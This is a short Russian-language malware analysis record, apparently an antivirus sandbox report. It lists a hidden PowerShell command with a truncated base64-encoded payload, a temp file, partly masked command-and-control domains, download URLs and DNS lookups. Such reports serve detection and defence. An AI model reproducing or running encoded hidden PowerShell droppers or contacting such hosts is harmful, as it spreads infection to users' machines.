Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABMAGgAeQB0AHIAeQByAHQAcQBhAHkAPQAnAEwAZQB0AHoAeABkAHQAegBzAGwAJwA7ACQATgBkAGoAdQBjAGcAaABrAGEAIAA9ACAAJwA5ADMAMwAnADsAJABWAGQAZQBtAHcAdgB3AG4AdwBhAD0AJwBHAHQAawBkAHIAZQBvAHIAeQB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 2012
- %TEMP%\1027016.cvr
- 'co#####onsultancy.com':443
- 'ac##ideo.co':80
- 'sm###ectro.com':80
- 'sm###ectro.com':443
- 'ai###egasus.com':443
- http://www.ac##ideo.co/cache/rzvKsqUX/
- http://www.sm###ectro.com/alfacgiapi/fkq-lke7btj-80091/
- 'co#####onsultancy.com':443
- 'sm###ectro.com':443
- 'ai###egasus.com':443
- DNS ASK wa###y1211.xyz
- DNS ASK co#####onsultancy.com
- DNS ASK ac##ideo.co
- DNS ASK sm###ectro.com
- DNS ASK ai###egasus.com